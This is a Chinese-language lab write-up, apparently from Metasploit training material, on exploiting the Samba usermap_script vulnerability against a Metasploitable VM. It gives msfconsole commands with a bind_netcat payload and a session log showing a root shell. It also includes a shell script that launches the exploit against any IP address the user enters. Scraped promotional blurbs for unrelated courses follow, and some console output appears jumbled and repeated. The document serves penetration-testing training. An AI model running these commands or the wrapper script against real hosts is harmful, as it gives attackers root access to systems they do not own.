實驗一:通過攻擊samba服務漏洞控制linux靶機
目標ip:192.168.232.134
實驗環境:kali linux
kali:msfconsole
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) >set payload cmd/unix/bind_netcat
msf exploit(usermap_script) >
show options
module options (exploit/multi/samba/usermap_script):
name current setting required description
---- --------------- -------- -----------
rhost yes the target address
rport 139 yes the target port
payload options (cmd/unix/bind_netcat)
msf exploit(usermap_script) > set rhost 192.168.232.134
rhost => 192.168.232.134
msf exploit(usermap_script) > exploit
name current setting required description
---- --------------- -------- -----------
lport 4444 yes the listen port
rhost no the target address
exploit target:
id name
-- ----
0 automatic
msf exploit(usermap_script) > set rhost 192.168.232.134
rhost => 192.168.232.134
msf exploit(usermap_script) > exploit
[*] started bind handler
[*] command shell session 1 opened (192.168.232.129:34139 -> 192.168.232.134:4444) at 2017-06-04 03:17:57 -0400
whoami
root
uname -a
linux metasploitable 2.6.24-16-server #1 smp thu apr 10 13:58:00 utc 2008 i686 gnu/linux ok
實驗二:
用msfcli命令編寫shell指令碼程式,實現使用者只需要輸入ip位址,即可使用usermap_script漏洞滲透攻擊模組
msfcli已經被取代,建議使用msfconsole -x
kali: vim metasploit.shell
echo "請輸入目標ip"
read ip
msfconsole -x "use exploit/multi/samba/usermap_script;set payload cmd/unix/bind_netcat;set rhost $ip;exploit"
kali:chomd a+x metasploit.shell
kali:./metasploit
Metasploit滲透測試魔鬼訓練營
首本中文原創metasploit滲透測試著作,國內資訊保安領域布道者和資深metasploit滲透測試專家領銜撰寫,極具權威性。以實踐為導向,既詳細講解了metasploit滲透測試的技術 流程 方法和技巧,又深刻闡釋了滲透測試平台背後蘊含的思想。本書是metasploit滲透測試領域難得的經典佳作...
python魔鬼訓練營作業 python魔鬼訓練營
本課程主要針對python常用的一些知識點,疑難點進行拆分並單獨講解 每乙個課程都會對具體的知識點先進行學習,然後在舉乙個具體的例子來實踐當次課程的內容 使得每乙個知識點都可以更加牢固的掌握。本課程的內容包括從python基礎 python的表示式 資料結構等基礎知識,還包括迭代器 包裝器等高階功能...
暑期七天魔鬼訓練營
第一天 1 luogu 2871 poj3624 charm bracelet 手鍊 01揹包 狀態壓縮 2 poj 1384 piggy bank 完全揹包 3 poj 2387 the cows come home 最短路徑模板 4 poj 3255 次短路 5 poj 3723 conscri...